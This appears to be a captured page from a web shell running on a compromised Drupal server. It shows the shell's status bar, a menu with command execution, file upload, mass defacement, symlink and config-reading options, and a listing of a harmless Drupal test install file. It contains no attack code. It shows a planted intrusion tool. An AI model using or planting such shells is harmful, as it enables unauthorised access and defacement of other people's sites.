OFF | cURL : OFF | WGET : ON | Perl : ON | Python : OFF Directory (0775) : /var/www/html/hpsc/../marc-drupal/modules/openid/../simpletest/../tracker/../file/../simpletest/tests/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
<?php /** * Impelement hook_install(). */ function url_alter_test_install() { // Set the weight of this module to one higher than forum.module. db_update('system') ->fields(array('weight' => 2)) ->condition('name', 'url_alter_test') ->execute(); }